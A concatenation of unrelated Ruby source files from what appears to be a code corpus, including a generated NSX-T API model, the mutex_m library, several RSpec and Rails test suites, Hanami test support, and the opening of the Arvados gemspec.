:'shared' => :'BOOLEAN',
:'footer' => :'Footer',
:'drilldown_id' => :'String',
:'is_drilldown' => :'BOOLEAN',
:'legend' => :'Legend',
:'layout' => :'Layout',
:'navigation' => :'String',
:'sub_type' => :'String',
:'properties' => :'Array<PropertyItem>'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'_self')
self._self = attributes[:'_self']
end
if attributes.has_key?(:'_links')
if (value = attributes[:'_links']).is_a?(Array)
self._links = value
end
end
if attributes.has_key?(:'_schema')
self._schema = attributes[:'_schema']
end
if attributes.has_key?(:'_revision')
self._revision = attributes[:'_revision']
end
if attributes.has_key?(:'_system_owned')
self._system_owned = attributes[:'_system_owned']
end
if attributes.has_key?(:'display_name')
self.display_name = attributes[:'display_name']
end
if attributes.has_key?(:'description')
self.description = attributes[:'description']
end
if attributes.has_key?(:'tags')
if (value = attributes[:'tags']).is_a?(Array)
self.tags = value
end
end
if attributes.has_key?(:'_create_user')
self._create_user = attributes[:'_create_user']
end
if attributes.has_key?(:'_protection')
self._protection = attributes[:'_protection']
end
if attributes.has_key?(:'_create_time')
self._create_time = attributes[:'_create_time']
end
if attributes.has_key?(:'_last_modified_time')
self._last_modified_time = attributes[:'_last_modified_time']
end
if attributes.has_key?(:'_last_modified_user')
self._last_modified_user = attributes[:'_last_modified_user']
end
if attributes.has_key?(:'id')
self.id = attributes[:'id']
end
if attributes.has_key?(:'resource_type')
self.resource_type = attributes[:'resource_type']
end
if attributes.has_key?(:'datasources')
if (value = attributes[:'datasources']).is_a?(Array)
self.datasources = value
end
end
if attributes.has_key?(:'weight')
self.weight = attributes[:'weight']
end
if attributes.has_key?(:'icons')
if (value = attributes[:'icons']).is_a?(Array)
self.icons = value
end
end
if attributes.has_key?(:'shared')
self.shared = attributes[:'shared']
end
if attributes.has_key?(:'footer')
self.footer = attributes[:'footer']
end
if attributes.has_key?(:'drilldown_id')
self.drilldown_id = attributes[:'drilldown_id']
end
if attributes.has_key?(:'is_drilldown')
self.is_drilldown = attributes[:'is_drilldown']
else
self.is_drilldown = false
end
if attributes.has_key?(:'legend')
self.legend = attributes[:'legend']
end
if attributes.has_key?(:'layout')
self.layout = attributes[:'layout']
end
if attributes.has_key?(:'navigation')
self.navigation = attributes[:'navigation']
end
if attributes.has_key?(:'sub_type')
self.sub_type = attributes[:'sub_type']
end
if attributes.has_key?(:'properties')
if (value = attributes[:'properties']).is_a?(Array)
self.properties = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if !@display_name.nil? && @display_name.to_s.length > 255
invalid_properties.push('invalid value for "display_name", the character length must be smaller than or equal to 255.')
end
if [email protected]? && @description.to_s.length > 1024
invalid_properties.push('invalid value for "description", the character length must be smaller than or equal to 1024.')
end
if @resource_type.nil?
invalid_properties.push('invalid value for "resource_type", resource_type cannot be nil.')
end
if @resource_type.to_s.length > 255
invalid_properties.push('invalid value for "resource_type", the character length must be smaller than or equal to 255.')
end
if !@drilldown_id.nil? && @drilldown_id.to_s.length > 255
invalid_properties.push('invalid value for "drilldown_id", the character length must be smaller than or equal to 255.')
end
if [email protected]? && @navigation.to_s.length > 1024
invalid_properties.push('invalid value for "navigation", the character length must be smaller than or equal to 1024.')
end
if @properties.nil?
invalid_properties.push('invalid value for "properties", properties cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if !@display_name.nil? && @display_name.to_s.length > 255
return false if [email protected]? && @description.to_s.length > 1024
return false if @resource_type.nil?
resource_type_validator = EnumAttributeValidator.new('String', ['LabelValueConfiguration', 'DonutConfiguration', 'MultiWidgetConfiguration', 'ContainerConfiguration', 'StatsConfiguration', 'GridConfiguration', 'GraphConfiguration'])
return false unless resource_type_validator.valid?(@resource_type)
return false if @resource_type.to_s.length > 255
return false if !@drilldown_id.nil? && @drilldown_id.to_s.length > 255
return false if [email protected]? && @navigation.to_s.length > 1024
sub_type_validator = EnumAttributeValidator.new('String', ['VERTICALLY_ALIGNED'])
return false unless sub_type_validator.valid?(@sub_type)
return false if @properties.nil?
true
end
# Custom attribute writer method with validation
# @param [Object] display_name Value to be assigned
def display_name=(display_name)
if !display_name.nil? && display_name.to_s.length > 255
fail ArgumentError, 'invalid value for "display_name", the character length must be smaller than or equal to 255.'
end
@display_name = display_name
end
# Custom attribute writer method with validation
# @param [Object] description Value to be assigned
def description=(description)
if !description.nil? && description.to_s.length > 1024
fail ArgumentError, 'invalid value for "description", the character length must be smaller than or equal to 1024.'
end
@description = description
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] resource_type Object to be assigned
def resource_type=(resource_type)
validator = EnumAttributeValidator.new('String', ['LabelValueConfiguration', 'DonutConfiguration', 'MultiWidgetConfiguration', 'ContainerConfiguration', 'StatsConfiguration', 'GridConfiguration', 'GraphConfiguration'])
unless validator.valid?(resource_type)
fail ArgumentError, 'invalid value for "resource_type", must be one of #{validator.allowable_values}.'
end
@resource_type = resource_type
end
# Custom attribute writer method with validation
# @param [Object] drilldown_id Value to be assigned
def drilldown_id=(drilldown_id)
if !drilldown_id.nil? && drilldown_id.to_s.length > 255
fail ArgumentError, 'invalid value for "drilldown_id", the character length must be smaller than or equal to 255.'
end
@drilldown_id = drilldown_id
end
# Custom attribute writer method with validation
# @param [Object] navigation Value to be assigned
def navigation=(navigation)
if !navigation.nil? && navigation.to_s.length > 1024
fail ArgumentError, 'invalid value for "navigation", the character length must be smaller than or equal to 1024.'
end
@navigation = navigation
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] sub_type Object to be assigned
def sub_type=(sub_type)
validator = EnumAttributeValidator.new('String', ['VERTICALLY_ALIGNED'])
unless validator.valid?(sub_type)
fail ArgumentError, 'invalid value for "sub_type", must be one of #{validator.allowable_values}.'
end
@sub_type = sub_type
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
_self == o._self &&
_links == o._links &&
_schema == o._schema &&
_revision == o._revision &&
_system_owned == o._system_owned &&
display_name == o.display_name &&
description == o.description &&
tags == o.tags &&
_create_user == o._create_user &&
_protection == o._protection &&
_create_time == o._create_time &&
_last_modified_time == o._last_modified_time &&
_last_modified_user == o._last_modified_user &&
id == o.id &&
resource_type == o.resource_type &&
datasources == o.datasources &&
weight == o.weight &&
icons == o.icons &&
shared == o.shared &&
footer == o.footer &&
drilldown_id == o.drilldown_id &&
is_drilldown == o.is_drilldown &&
legend == o.legend &&
layout == o.layout &&
navigation == o.navigation &&
sub_type == o.sub_type &&
properties == o.properties
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[_self, _links, _schema, _revision, _system_owned, display_name, description, tags, _create_user, _protection, _create_time, _last_modified_time, _last_modified_user, id, resource_type, datasources, weight, icons, shared, footer, drilldown_id, is_drilldown, legend, layout, navigation, sub_type, properties].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXT.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 35.554404 | 508 | 0.642816 |
21d828523ed3922e30e1be2f8bfd5426703874d5 | 1,491 | #
# mutex_m.rb -
# $Release Version: 3.0$
# $Revision: 1.7 $
# Original from mutex.rb
# by Keiju ISHITSUKA([email protected])
# modified by matz
# patched by akira yamada
#
# --
# Usage:
# require "mutex_m.rb"
# obj = Object.new
# obj.extend Mutex_m
# ...
# extended object can be handled like Mutex
# or
# class Foo
# include Mutex_m
# ...
# end
# obj = Foo.new
# this obj can be handled like Mutex
#
require 'thread'
module Mutex_m
def Mutex_m.define_aliases(cl)
cl.module_eval %q{
alias locked? mu_locked?
alias lock mu_lock
alias unlock mu_unlock
alias try_lock mu_try_lock
alias synchronize mu_synchronize
}
end
def Mutex_m.append_features(cl)
super
define_aliases(cl) unless cl.instance_of?(Module)
end
def Mutex_m.extend_object(obj)
super
obj.mu_extended
end
def mu_extended
unless (defined? locked? and
defined? lock and
defined? unlock and
defined? try_lock and
defined? synchronize)
Mutex_m.define_aliases(class<<self;self;end)
end
mu_initialize
end
# locking
def mu_synchronize(&block)
@_mutex.synchronize(&block)
end
def mu_locked?
@_mutex.locked?
end
def mu_try_lock
@_mutex.try_lock
end
def mu_lock
@_mutex.lock
end
def mu_unlock
@_mutex.unlock
end
private
def mu_initialize
@_mutex = Mutex.new
end
def initialize(*args)
mu_initialize
super
end
end
| 16.206522 | 53 | 0.652582 |
7a400005aec8d55bec89146116b700daea685556 | 1,606 | # frozen_string_literal: true
require 'test_helper'
class UsersSignupTest < ActionDispatch::IntegrationTest
test 'unsuccessful signup create new user' do
get signup_path
assert_no_difference 'User.count' do
post signup_path, params: { user: { name: '',
email: '',
password: '',
password_confirmation: '' } }
end
assert_select 'h1', text: 'Sign up'
assert_select 'div.field_with_errors'
User.new.errors.full_messages.each do |message|
assert_select 'div#error_explanation li', text: message
end
assert_select 'div.alert-danger'
end
test 'error messages display and are accurate' do
get signup_path
user = User.new(name: '', email: '', password: '', password_confirmation: '')
user.valid?
assert user.errors.messages.values_at(:name, :email, :password_confirmation, :password)
# assert_select 'div#error_explanation li', text: "attribute: name, message: "
end
test 'successful signup create new user' do
get signup_path
assert_difference 'User.count', 1 do
post users_path, params: { user: { name: "Example User",
email: "[email protected]",
password: "password",
password_confirmation: "password" } }
end
assert_redirected_to user_path(User.last.id)
assert_equal "Welcome to the Sample App!", flash[:success]
assert is_logged_in?
end
end
| 37.348837 | 91 | 0.5934 |
61e504b3c7443949a99b9faec5dc8c5bda80c5a6 | 315 | # frozen_string_literal: true
require "rails_helper"
module Renalware
describe System::Country, type: :model do
it :aggregate_failures do
is_expected.to validate_presence_of(:name)
is_expected.to validate_presence_of(:alpha2)
is_expected.to validate_presence_of(:alpha3)
end
end
end
| 22.5 | 50 | 0.752381 |
389d6f08f65184acf903808bacc8c5680d2c540f | 285 | class StaticPagesController < ApplicationController
def home
if logged_in?
@micropost = current_user.microposts.build
@feed_items = current_user.feed.paginate(page: params[:page])
end
end
def help
end
def about
end
def contact
end
end
| 14.25 | 67 | 0.673684 |
e29f740760b761820a636addf09a529902fbb3cb | 6,183 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe JabberAdmin do
describe '.configuration' do
it 'return a new instance of JabberAdmin::Configuration' do
expect(described_class.configuration).to be_a(JabberAdmin::Configuration)
end
it 'memorizes the configuration instance' do
conf = described_class.configuration
expect(described_class.configuration).to be(conf)
end
end
describe '.configure' do
it 'yields the configuration object' do
conf = described_class.configuration
expect { |block| described_class.configure(&block) }.to \
yield_with_args(conf)
end
it 'saves the new configuration values' do
described_class.configure do |config|
config.url = 'https://jabber.local/api'
end
expect(described_class.configuration.url).to \
eq('https://jabber.local/api')
end
end
describe '.method_missing' do
before do
allow(JabberAdmin::ApiCall).to receive(:perform)
allow(JabberAdmin::ApiCall).to receive(:perform!)
end
context 'with predefined commands' do
context 'with bang' do
it 'passes the arguments down to the API call' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('unregister', check_res_body: false,
user: 'tom',
host: 'jabber.local')
described_class.unregister!(user: '[email protected]')
end
it 'passes no arguments when none are given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('restart')
described_class.restart!
end
it 'passes no block when one is given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('restart')
described_class.restart! { true }
end
end
context 'without bang' do
it 'passes the arguments down to the API call' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('unregister', check_res_body: false,
user: 'tom',
host: 'jabber.local')
described_class.unregister(user: '[email protected]')
end
it 'passes no arguments when none are given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('restart')
described_class.restart
end
it 'passes no block when one is given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('restart')
described_class.restart { true }
end
end
end
context 'without predefined commands' do
context 'with bang' do
it 'passes the arguments down to the API call' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('unknown', user: 'Tom')
described_class.unknown!(user: 'Tom')
end
it 'passes no arguments when none are given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('unknown')
described_class.unknown!
end
it 'passes no block when one is given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('unknown')
described_class.unknown! { true }
end
end
context 'without bang' do
it 'passes the arguments down to the API call' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('unknown', user: 'Tom')
described_class.unknown(user: 'Tom')
end
it 'passes no arguments when none are given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('unknown')
described_class.unknown
end
it 'passes no block when one is given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('unknown')
described_class.unknown { true }
end
end
end
end
describe '.predefined_command' do
it 'raises a NameError in case the given command is not known' do
expect { described_class.predefined_command('unknown') }.to \
raise_error(NameError)
end
it 'returns the class constant when the given command is known' do
expect(described_class.predefined_command('restart')).to \
be(JabberAdmin::Commands::Restart)
end
it 'can deal with bang-versions' do
expect(described_class.predefined_command('restart!')).to \
be(JabberAdmin::Commands::Restart)
end
end
describe '.predefined_callable' do
before do
allow(JabberAdmin::ApiCall).to receive(:perform)
allow(JabberAdmin::ApiCall).to receive(:perform!)
end
it 'builds a working wrapper for a bang version' do
expect(JabberAdmin::ApiCall).to receive(:perform!).once
described_class.predefined_callable('unknown!').call
end
it 'builds a working wrapper for a non-bang version' do
expect(JabberAdmin::ApiCall).to receive(:perform).once
described_class.predefined_callable('unknown').call
end
it 'passes down arguments' do
args = { user: 'Tom', room: 'Basement' }
expect(JabberAdmin::ApiCall).to receive(:perform).once.with(*args)
described_class.predefined_callable('unknown').call(*args)
end
end
describe '.respond_to?' do
context 'with predefined commands' do
it 'responds to commands with bang' do
expect(described_class.respond_to?(:register!)).to eq(true)
end
it 'responds to commands without bang' do
expect(described_class.respond_to?(:register)).to eq(true)
end
end
context 'without predefined commands' do
it 'responds to commands with bang' do
expect(described_class.respond_to?(:unknown!)).to eq(true)
end
it 'responds to commands without bang' do
expect(described_class.respond_to?(:unknown)).to eq(true)
end
end
end
end
| 32.542105 | 79 | 0.617014 |
ff7df439805ae185cb29f8998c57f2747e71e5aa | 4,502 | # This file was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause this
# file to always be loaded, without a need to explicitly require it in any files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need it.
#
# The `.rspec` file also contains a few flags that are not defaults but that
# users commonly want.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# Use color in STDOUT
config.color = true
# Use color not only in STDOUT but also in pagers and files
config.tty = true
# Use the specified formatter
config.formatter = :documentation # :progress, :html, :textmate
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# These two settings work together to allow you to limit a spec run
# to individual examples or groups you care about by tagging them with
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
# get run.
config.filter_run :focus
config.run_all_when_everything_filtered = true
# Limits the available syntax to the non-monkey patched syntax that is recommended.
# For more details, see:
# - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
# - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
config.disable_monkey_patching!
# This setting enables warnings. It's recommended, but in some cases may
# be too noisy due to issues in dependencies.
config.warnings = true
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = 'doc'
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
require "pry-byebug"
require "./lib/thread_kit" | 44.574257 | 129 | 0.742781 |
088a3897d58c4aa82d4557ebedd0330371763aee | 9,727 | require_relative "../../aws_refresher_spec_common"
require_relative "../../aws_refresher_spec_counts"
describe ManageIQ::Providers::Amazon::CloudManager::Refresher do
include AwsRefresherSpecCommon
include AwsRefresherSpecCounts
before(:each) do
@ems = FactoryGirl.create(:ems_amazon_with_vcr_authentication, :provider_region => "us-west-1")
end
AwsRefresherSpecCommon::ALL_OLD_REFRESH_SETTINGS.each do |settings|
context "with settings #{settings}" do
before(:each) do
stub_refresh_settings(settings)
end
it "will perform a full refresh on another region" do
2.times do # Run twice to verify that a second run with existing data does not change anything
@ems.reload
VCR.use_cassette("#{described_class.name.underscore}_other_region") do
EmsRefresh.refresh(@ems)
EmsRefresh.refresh(@ems.network_manager)
EmsRefresh.refresh(@ems.ebs_storage_manager)
@ems.reload
assert_counts(table_counts_from_api)
end
assert_specific_flavor
assert_specific_az
assert_specific_floating_ip
assert_specific_key_pair
assert_specific_security_group
assert_specific_template
assert_specific_vm_powered_on
assert_specific_vm_in_other_region
assert_relationship_tree
assert_subnet_required
end
end
end
def table_counts_from_api
counts = super
counts[:network_router] = 0 # We do not collect NetworkRouters in old refresh
# Old refresh can't fetch some images, those will have missing operating_system
counts[:operating_system] = counts[:operating_system] - Vm.all.select { |x| x.genealogy_parent.nil? }.count
counts
end
end
def assert_specific_flavor
@flavor = ManageIQ::Providers::Amazon::CloudManager::Flavor.where(:name => "t1.micro").first
expect(@flavor).to have_attributes(
:name => "t1.micro",
:description => "T1 Micro",
:enabled => true,
:cpus => 1,
:cpu_cores => 1,
:memory => 0.613.gigabytes.to_i,
:supports_32_bit => true,
:supports_64_bit => true,
:supports_hvm => false,
:supports_paravirtual => true
)
expect(@flavor.ext_management_system).to eq(@ems)
end
def assert_specific_az
@az = ManageIQ::Providers::Amazon::CloudManager::AvailabilityZone.where(:name => "us-west-1a").first
expect(@az).to have_attributes(
:name => "us-west-1a",
)
end
def assert_specific_floating_ip
ip = ManageIQ::Providers::Amazon::NetworkManager::FloatingIp.where(:address => "54.215.0.230").first
expect(ip).to have_attributes(
:address => "54.215.0.230",
:ems_ref => "54.215.0.230",
:cloud_network_only => false
)
@ip = ManageIQ::Providers::Amazon::NetworkManager::FloatingIp.where(:address => "204.236.137.154").first
expect(@ip).to have_attributes(
:address => "204.236.137.154",
:ems_ref => "204.236.137.154",
:fixed_ip_address => "10.191.129.95",
:cloud_network_only => false
)
end
def assert_specific_key_pair
@kp = ManageIQ::Providers::Amazon::CloudManager::AuthKeyPair.where(:name => "EmsRefreshSpec-KeyPair-OtherRegion").first
expect(@kp).to have_attributes(
:name => "EmsRefreshSpec-KeyPair-OtherRegion",
:fingerprint => "fc:53:30:aa:d2:23:c7:8d:e2:e8:05:95:a0:d2:90:fb:15:30:a2:51"
)
end
def assert_specific_security_group
@sg = ManageIQ::Providers::Amazon::NetworkManager::SecurityGroup.where(:name => "EmsRefreshSpec-SecurityGroup-OtherRegion").first
expect(@sg).to have_attributes(
:name => "EmsRefreshSpec-SecurityGroup-OtherRegion",
:description => "EmsRefreshSpec-SecurityGroup-OtherRegion",
:ems_ref => "sg-2b87746f"
)
expect(@sg.firewall_rules.size).to eq(1)
expect(@sg.firewall_rules.first).to have_attributes(
:host_protocol => "TCP",
:direction => "inbound",
:port => 0,
:end_port => 65535,
:source_security_group_id => nil,
:source_ip_range => "0.0.0.0/0"
)
end
def assert_specific_template
@template = ManageIQ::Providers::Amazon::CloudManager::Template.where(:name => "EmsRefreshSpec-Image-OtherRegion").first
expect(@template).to have_attributes(
:template => true,
:ems_ref => "ami-183e175d",
:ems_ref_obj => nil,
:uid_ems => "ami-183e175d",
:vendor => "amazon",
:power_state => "never",
:location => "200278856672/EmsRefreshSpec-Image-OtherRegion",
:tools_status => nil,
:boot_time => nil,
:standby_action => nil,
:connection_state => nil,
:cpu_affinity => nil,
:memory_reserve => nil,
:memory_reserve_expand => nil,
:memory_limit => nil,
:memory_shares => nil,
:memory_shares_level => nil,
:cpu_reserve => nil,
:cpu_reserve_expand => nil,
:cpu_limit => nil,
:cpu_shares => nil,
:cpu_shares_level => nil
)
expect(@template.ext_management_system).to eq(@ems)
expect(@template.operating_system).to(
have_attributes(
:product_name => "linux_generic",
)
)
expect(@template.custom_attributes.size).to eq(0)
expect(@template.snapshots.size).to eq(0)
expect(@template.hardware).to have_attributes(
:guest_os => "linux_generic",
:guest_os_full_name => nil,
:bios => nil,
:annotation => nil,
:cpu_sockets => 1, # wtf
:memory_mb => nil,
:disk_capacity => nil,
:bitness => 64
)
expect(@template.hardware.disks.size).to eq(0)
expect(@template.hardware.guest_devices.size).to eq(0)
expect(@template.hardware.nics.size).to eq(0)
expect(@template.hardware.networks.size).to eq(0)
end
def assert_specific_vm_powered_on
v = ManageIQ::Providers::Amazon::CloudManager::Vm.where(:name => "EmsRefreshSpec-PoweredOn-OtherRegion", :raw_power_state => "running").first
expect(v).to have_attributes(
:template => false,
:ems_ref => "i-dc1ee486",
:ems_ref_obj => nil,
:uid_ems => "i-dc1ee486",
:vendor => "amazon",
:power_state => "on",
:location => "ec2-204-236-137-154.us-west-1.compute.amazonaws.com",
:tools_status => nil,
:boot_time => Time.zone.parse("2013-08-31T00:12:43.000"),
:standby_action => nil,
:connection_state => nil,
:cpu_affinity => nil,
:memory_reserve => nil,
:memory_reserve_expand => nil,
:memory_limit => nil,
:memory_shares => nil,
:memory_shares_level => nil,
:cpu_reserve => nil,
:cpu_reserve_expand => nil,
:cpu_limit => nil,
:cpu_shares => nil,
:cpu_shares_level => nil
)
expect(v.ext_management_system).to eq(@ems)
expect(v.availability_zone).to eq(@az)
expect(v.floating_ip).to eq(@ip)
expect(v.flavor).to eq(@flavor)
expect(v.cloud_network).to be_nil
expect(v.cloud_subnet).to be_nil
expect(v.security_groups).to eq([@sg])
expect(v.key_pairs).to eq([@kp])
expect(v.operating_system).to(
have_attributes(
:product_name => "linux_generic",
)
)
expect(v.custom_attributes.size).to eq(1)
expect(v.snapshots.size).to eq(0)
expect(v.hardware).to have_attributes(
:guest_os => "linux_generic",
:guest_os_full_name => nil,
:bios => nil,
:annotation => nil,
:cpu_sockets => 1,
:memory_mb => 627,
:disk_capacity => 0, # TODO: Change to a flavor that has disks
:bitness => 64
)
expect(v.hardware.disks.size).to eq(1) # TODO: Change to a flavor that has disks
expect(v.hardware.guest_devices.size).to eq(0)
expect(v.hardware.nics.size).to eq(0)
expect(v.hardware.networks.size).to eq(2)
network = v.hardware.networks.where(:description => "public").first
expect(network).to have_attributes(
:description => "public",
:ipaddress => "204.236.137.154",
:hostname => "ec2-204-236-137-154.us-west-1.compute.amazonaws.com"
)
network = v.hardware.networks.where(:description => "private").first
expect(network).to have_attributes(
:description => "private",
:ipaddress => "10.191.129.95",
:hostname => "ip-10-191-129-95.us-west-1.compute.internal"
)
v.with_relationship_type("genealogy") do
expect(v.parent).to eq(@template)
end
end
def assert_specific_vm_in_other_region
v = ManageIQ::Providers::Amazon::CloudManager::Vm.where(:name => "EmsRefreshSpec-PoweredOn-Basic").first
expect(v).to be_nil
end
def assert_relationship_tree
expect(@ems.descendants_arranged).to match_relationship_tree({})
end
def assert_subnet_required
@flavor = ManageIQ::Providers::Amazon::CloudManager::Flavor.where(:name => "t2.small").first
expect(@flavor).to have_attributes(:cloud_subnet_required => true)
end
end
| 36.430712 | 145 | 0.599157 |
ab56d726d45054beabea4f89af72bf9c042e467b | 1,500 | # frozen_string_literal: true
require "hanami/devtools/integration/files"
require "hanami/devtools/integration/with_tmp_directory"
RSpec.shared_context "Application integration" do
let(:application_modules) { %i[TestApp Main] }
end
RSpec.configure do |config|
config.include RSpec::Support::Files, :application_integration
config.include RSpec::Support::WithTmpDirectory, :application_integration
config.include_context "Application integration", :application_integration
config.before :each, :application_integration do
@load_paths = $LOAD_PATH.dup
application_modules.each do |app_module|
Object.const_set(app_module, Module.new { |m| m.extend(TestNamespace) })
end
end
config.after :each, :application_integration do
# Tear down Zeitwerk (from zeitwerk's own test/support/loader_test)
Zeitwerk::Registry.loaders.each(&:unload)
Zeitwerk::Registry.loaders.clear
Zeitwerk::Registry.loaders_managing_gems.clear
Zeitwerk::ExplicitNamespace.cpaths.clear
Zeitwerk::ExplicitNamespace.tracer.disable
$LOAD_PATH.replace(@load_paths)
$LOADED_FEATURES.delete_if do |feature_path|
feature_path =~ %r{hanami/(setup|init|boot)}
end
application_modules.each do |app_module|
Object.const_get(app_module).remove_constants
Object.send :remove_const, app_module
end
%i[@_application @_app].each do |ivar|
Hanami.remove_instance_variable(ivar) if Hanami.instance_variable_defined?(ivar)
end
end
end
| 32.608696 | 86 | 0.762667 |
019e156a56d428ae79add12d720d58a7f24f7b3f | 2,158 | # Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
if not File.exist?('/usr/bin/git') then
STDERR.puts "\nGit binary not found, aborting. Please install git and run gem build from a checked out copy of the git repository.\n\n"
exit
end
git_dir = ENV["GIT_DIR"]
git_work = ENV["GIT_WORK_TREE"]
begin
ENV["GIT_DIR"] = File.expand_path "#{__dir__}/../../.git"
ENV["GIT_WORK_TREE"] = File.expand_path "#{__dir__}/../.."
git_timestamp, git_hash = `git log -n1 --first-parent --format=%ct:%H #{__dir__}`.chomp.split(":")
if ENV["ARVADOS_BUILDING_VERSION"]
version = ENV["ARVADOS_BUILDING_VERSION"]
else
version = `#{__dir__}/../../build/version-at-commit.sh #{git_hash}`.encode('utf-8').strip
end
git_timestamp = Time.at(git_timestamp.to_i).utc
ensure
ENV["GIT_DIR"] = git_dir
ENV["GIT_WORK_TREE"] = git_work
end
Gem::Specification.new do |s|
s.name = 'arvados'
s.version = version
s.date = git_timestamp.strftime("%Y-%m-%d")
s.summary = "Arvados client library"
s.description = "Arvados client library, git commit #{git_hash}"
s.authors = ["Arvados Authors"]
s.email = '[email protected]'
s.licenses = ['Apache-2.0']
